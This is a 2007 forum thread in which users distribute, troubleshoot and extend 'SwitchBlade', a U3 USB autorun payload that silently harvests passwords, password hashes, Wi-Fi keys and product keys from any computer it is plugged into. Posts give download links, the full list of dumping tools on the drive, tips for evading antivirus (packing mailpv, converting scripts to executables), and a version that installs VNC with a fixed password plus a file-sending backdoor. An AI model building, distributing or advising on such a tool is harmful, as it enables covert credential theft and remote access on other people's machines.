setzer1411 Posted May 30, 2007

THIS IS A POST FOR -=GonZor=- HE IS HAVING TROUBLE POSTING DUE TO THE ATTACKS ON THE SERVERS

THIS IS QUOTED VERBATIM OF WHAT HE WANTED TO POST

Here is a link to my payload http://www.users.on.net/~simmo_89/switchblade/Index.html

Here is a mirror for my payload http://rapidshare.com/files/34270702/GonZors_SwitchBlade.zip

Yes I know what you're all thinking, How is this different to any other payload? Well basically my payload has an advantage over others because the payload is on the CD Partition so it is protected and cannot be deleted. It can be easily and fully customized by using an app I made (SBConfig.exe)

The site at the moment has a very basic installation guide on it but tomorrow I will be creating a better page with a better explanation, if you would just bear with me till this is done, I will also answer a lot of your questions on here because due to the attacks on the servers I am having trouble posting.

setzer1411 Posted May 30, 2007

if anyone has trouble with the rapidshare download let me know and I'll do my best to fix it. just pm me or email me setzer1411@gmail.com

lixo Posted May 31, 2007

Hello,

Thanks for posting GonZor's payload and thank you GonZor for sharing :smile:

I've flashed my CD partition and when I execute SBconfig.exe I get this error:

Run time error 76
Path not found

And yes I did put SBConfig.exe in the flash partition as per the instructions on the site. Any idea of what I'm doing wrong? What path does it have problems finding?

Also as you all know mailpv.exe is detected by most AV so you might want to disable it when installing. Now only to find a nice unknown packer to make mailpv undetectable...

lixo Posted June 1, 2007

Hi GonZor,

I'm glad you were able to fix the runtime error. Thanks again for sharing, I do like your payload a lot.

I have a few more bugs to report:

After flashing the CD partition everything seems to go well until I plug the cruzer back in. Then I get a window that says the following:

Windows - No Disk
There is no disk in the drive. Please insert a disk into drive.
Cancel, Try Again, Continue

I have to click cancel 3 times to get rid of the error message. After that I can access the flash partition fine and load SBConfig and execute it. When I then unplug and plug back in the cruzer the message pops back up. This time I click cancel 3 times and it goes away for a few seconds but keeps popping back up in a never ending loop. Now I believe this happens because the payload is executing all the different goodies and each access pops up the error message. However it does work and produces a nice big logfile.

This happens on my XP Pro SP2 English fully patched stand alone machine running as admin user.

Hope this helps in improving this nice payload.

Cheers

EDIT: The same problem regarding the disk error also happens with Windows Server 2003 English

GonZor Posted June 3, 2007

Finally I can post, there is a fix on the site for the SBConfig "Run time error 76" just visit the FAQ

> I have a few more bugs to report:
>
> After flashing the CD partition everything seems to go well until I plug the cruzer back in. Then I get a window that says the following:
>
> Windows - No Disk
> There is no disk in the drive. Please insert a disk into drive.
> Cancel, Try Again, Continue
>
> I have to click cancel 3 times to get rid of the error message. After that I can access the flash partition fine and load SBConfig and execute it. When I then unplug and plug back in the cruzer the message pops back up. This time I click cancel 3 times and it goes away for a few seconds but keeps popping back up in a never ending loop. Now I believe this happens because the payload is executing all the different goodies and each access pops up the error message. However it does work and produces a nice big logfile.
>
> This happens on my XP Pro SP2 English fully patched stand alone machine running as admin user.
>
> Hope this helps in improving this nice payload.
>
> Cheers
>
> EDIT: The same problem regarding the disk error also happens with Windows Server 2003 English

If anyone has any more info on this it would be appreciated, the only thing I can think of is an error occurred when you flashed your drive, I have done this to multiple drives without any errors

lixo Posted June 5, 2007

Me again.

It is pretty strange. Some machines give me the disk error message, others don't. I can't figure out what is causing this. I've tried flashing it again and still same problem. Maybe I'll try flashing it in another computer to see if anything changes. I will keep you posted.

ASTRAPI Posted June 7, 2007

It doesn't autostart for me, only when I double click the flash drive it works great.

Any idea how to fix this?

I think the problem is in the files in the CD partition of my flash disk.

If anyone can post the correct files or can help me with the correct settings it will be great.

Thanks

GonZor Posted June 8, 2007

When you say "It doesn't autostart for me" which part are you referring to?

Here is a list of files that should be on the CD partition of your drive, make sure all the files are there

- autorun.inf
- go.vbs
- launchpad.zip
- launchu3.exe
- start.bat
- SRCduh.vbs
- SRCgo.bat
- SRCiepv.exe
- SRClsaext.dll
- SRCmailpv.exe
- SRCmspass.exe
- SRCnetpass.exe
- SRCprodukey.exe
- SRCpspv.exe
- SRCpwdump.exe
- SRCpwservice.exe
- SRCwifike.exe
- SRCcachedump.exe
- SRCfirepassword.exe
- SRCnspr4.dll
- SRCnss3.dll
- SRCplc4.dll
- SRCplds4.dll
- SRCsoftokn3.dll
- SRCportqry.exe
- SRCwul.exe

you may need to re run SBConfig.exe (make sure you have updated to the latest version of SBConfig.exe it should be V1.0.11) depending of course on what specifically the problem is, also are you sure that the computer you are testing on auto runs a U3 drive?

these are just a few thoughts if you have any more information I will do my best to fix the problem

ASTRAPI Posted June 8, 2007

Oops it works, my mistake. Sorry.

I will use the latest sbconfig to take out some services that I don't need.

Great job my friend.

Thank you so much.

GonZor Posted June 8, 2007

No problem, I will also suggest to everyone using my payload make sure you have updated to the latest release of SBConfig.exe - V1.0.11. This contains no known bugs unlike previous releases.

setzer1411 Posted June 8, 2007

Very nice work, here are rapidshare links for the New SB Config and the Universal Customizer...

http://rapidshare.com/files/35933462/SBConfig.zip
http://rapidshare.com/files/35933634/Unive..._Customizer.zip

I will upload the Payload when I get off work (the AV here throws a fit when I download it lol). I hope everyone enjoys this and be sure to thank Gonzor for his contribution, this is an outstanding setup.

If you have any questions or comments feel free to email me at setzer1411@gmail.com

setzer1411 Posted June 9, 2007

http://rapidshare.com/files/36065435/GonZo...hBlade-V1.2.zip

The new Payload, enjoy =P

GonZor Posted June 9, 2007

Thanks for the linkage setzer,

If any one has any problems, questions, comments, ideas, or anything to do with the payload email me at gonzor228@gmail.com and I will get back to you asap

If the rapid share links are broken either email me or setzer and one of us will fix them

GonZor Posted June 11, 2007

Would people like an exe in place of go.cmd?

Let me know your thoughts

atkinchris Posted June 13, 2007

Firstly: thanks for taking a very useful tool and making it better!

I was just thinking about that today GonZor, because when I attempted to use it on a number of systems, although the tools didn't get flagged by AV (I don't use the MailPV option) the scripts did, purely for script permissions, not as unwanted programs (tested on McAfee and Norton). An .exe would slide past these innocently...

hxxp: renegadetech. blogspot. com/2006/07/how-to-convert-bat-file-or-vbs-file. html

That's from a quick Google... requires only tools freely available in Windows XP!

On a side note: I have a Sandisk Cruzer 2GB, and although U3 didn't start on Vista (It was disabled I found :P) your payload did... presenting me with a complete log, spare the PWDump log (try FGDump... it's Vista compatible, and provides far more functions). The latest PWDump6 is supposedly Vista compatible too, but I haven't tried it.

Regards,
Chris

elmer Posted June 15, 2007

I am fine with either. Nice work on the payload, I was actually planning on making the same thing! You beat me to it, though now I don't have to code it up! Yay!

7even Sins Posted June 17, 2007

Hello, All

@ GonZor Thanks for all the hard work you put in to this. may I ask are you going to add the Switchblade ? to your own tool. if so may I ask when don't want to miss this one ;) anyways I will be keeping an eye on this Thread.

Best of luck
7Sins

elmer Posted June 17, 2007

Uh... this is a switchblade. What are you talking about?

GonZor Posted June 17, 2007

Sorry I haven't replied in a while I've been fairly busy.

> ...the scripts did, purely for script permissions, not as unwanted programs (tested on McAfee and Norton). An .exe would slide past these innocently...
>
> hxxp: renegadetech. blogspot. com/2006/07/how-to-convert-bat-file-or-vbs-file. html

unfortunately that would not convert it to an exe, it would create a self extracting archive with a bat inside, and would not solve your problem. I am working on rewriting everything into an exe.

> try FGDump... it's Vista compatible, and provides far more functions.

Thanks for the suggestion, I will swap pwdump for fgdump in the next release

> are you going to add the Switchblade ? to your own tool.

I'm going to assume you meant HakSaw? Yes I am currently working on V2.0 that will include a lot more, mostly functions that will infect the computer like HakSaw and VNC. I have also added a function to dump the external IP to the log if it is connected to the internet.

I am currently having trouble with the HakSaw I have never used it before, I have the installation to work properly but It will not send the files. I have also tested with the original payload and cannot get it to send. Please email any ideas to gonzor228@gmail.com.

GonZor Posted June 19, 2007

Version 2.0 Released

I have just finished uploading V2.0. I have not had a chance to test the VNC so feedback is needed. The Hacksaw component won't start until the user logs on next (it was pausing the payload). I am about to create an update log to give more details.

Ok what's new? not much unfortunately :( but on the plus side no editing a batch file to setup the HakSaw :-P

- Dump External IP to the log file (props to Marc for ip.shtml)
- Install VNC (untested, it installs but didn't have a chance to test connection)
- HakSaw (Doesn't run until the user logs on next)

Once again check the site for the payload http://www.users.on.net/~simmo_89/switchblade/Index.html

EDIT - I just realized I'm an idiot, the password for VNC is hacked

setzer1411 Posted June 19, 2007

nicely done, I'll test it when I get home

setzer1411 Posted June 20, 2007

WOW after i load my apps into the iso (to keep them safe on cd side) the iso is 994mb that is kinda mean to the usb drive... lol

very nice setup but I honestly believe you should team up with Leapo =P

elmer Posted June 20, 2007

trustme Posted June 21, 2007

@ setzer and all the others who keep insisting they combine payloads

GonZor’s payload is amazing on its own; there is no reason to combine it with leapo’s. I can’t think of anything leapo’s payload can do that GonZor’s can’t (or can't be added as a package) besides function on a non-U3 drive. As Gonzor said, he is going to add support for that when he gets time, and you can’t just copy and paste Leapo’s code into GonZor’s. They would still have to be kept separate, a U3 and a non-U3 version which is basically how things are now.

GonZor's payload has the advantage of the built in protection of the cd rom drive as well as his ability to turn parts of the package on and off using a gui.

As far as creativity goes, it’s not like either is barring the other from using their code or ideas. I think it's pointless to combine them under one name. Can anyone give a good reason why they should team up?

setzer1411 Posted June 21, 2007

simple, if they were creative enough to come up with each payload on their own (as individuals) wouldn't it be feasible for them to combine efforts and make a superior product?

Example: 1(an individual)+1(another individual)=2(greater than any single individual)